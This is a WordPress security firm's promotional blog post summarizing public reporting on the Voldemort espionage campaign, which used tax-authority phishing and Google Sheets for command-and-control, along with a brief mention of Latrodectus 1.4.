Guarding Your WordPress Site: The Evolution of Modern Malware and the Emergence of Cyber Espionage
In the realm of cybersecurity, a unique malware campaign has been discovered. This innovative campaign utilizes Google Sheets as a command-and-control (C2) mechanism, forging a path into uncharted territories of cyberattacks. The threat actors behind this campaign have been impersonating tax authorities worldwide, notably from Europe, Asia, and the U.S., with the primary aim to target the global population of organizations – a whopping 70 and counting. These operations are conducted using a tailored tool, aptly named Voldemort, known for its ability to accumulate data and deliver further payloads.
The sectors targeted by this sophisticated attack vary greatly, covering insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom, and social benefit organizations. This implies that no industry is immune to such a threat and there is an overarching need for malware removal to maintain digital security.
No specific named threat actor has been attributed thus far to this suspected cyber espionage campaign. An estimated 20,000 email messages are part of this operation. These unassuming emails impersonating tax authorities from around the world raise the alarm about alterations in the recipient’s tax filing. This manipulative strategy tempts the recipient to click on Google AMP Cache URLs leading them to an intermediary landing page.
This deceptive web page executes an inspection of the User-Agent string and exploits the search-ms: URI protocol handler, tricking victims to launch it if they are using a Windows operating system. “Once the LNK file is launched, it invokes PowerShell to run Python.exe, subsequently initiating a Python script as an argument.” This crafty mechanism allows the malware to run without any files being downloaded onto the user’s computer, with dependencies being directly loaded from the WebDAV share.
The purpose of the Python script is predominantly to collect system information. The collected data is sent to an actor-controlled domain in the form of a Base64-encoded string followed by exhibiting a decoy PDF file to the user. After this process, the script procures a password-protected ZIP file from OpenDrive.
As a consequential part of the wordpress malware removal task, we now veer our attention towards combating a custom backdoor called Voldemort. Written in C, Voldemort is equipped with functions for data collection, loading next-stage payloads and utilizes Google Sheets for C2, data exfiltration, and executing commands from the operators.
Proofpoint describes this kind of activity to be in line with advanced persistent threats (APT). However, the strategy carries an aspect of the e-crime landscape, as many threat actors abuse file schema URIs to gain access to external file sharing resources for malware staging.
The Emerging Landscape of Cyber Espionage
Following the process of decoding the contents of the Google Sheet, Proofpoint managed to identify a total of six victims. This included a sandbox or a “known researcher” indicating the unusual breadth of the campaign. The campaign reveals that the threat actors cast a wide net before zeroing in on a small pool of targets. Thus, indicating that organizations with varying levels of technical expertise were planned to be infected.
Proofpoint opines, “While many of the campaign characteristics align with cybercriminal threat activity, we assess this is likely espionage activity conducted to support as yet unknown final objectives. The Frankensteinian amalgamation of clever and sophisticated capabilities, paired with very basic techniques and functionality, makes it difficult to assess the level of the threat actor’s capability and determine with high confidence the ultimate goals of the campaign.”
Such advancements underline the part that malware plays in our digital economy, elevating the importance of services like restore hacked wordpress site, which focus on salvaging the entity from the aftermath of such cyber-attacks.
The art of cyber warfare continues to evolve at a fast pace. As proof, Netskope Threat Labs discovered a new version of the Latrodectus, version 1.4, which brings to the table a new C2 endpoint. It also incorporates two new backdoor commands allowing function to download shellcode from a specified server and retrieve arbitrary files from a remote location.
To keep up with such rapid evolution, there is an increased need for services dedicated to wordpress malware removal and restore hacked wordpress sites.
Need security services for your WordPress site? Contact DrGlenn for protection and recovery. Order Services Today!.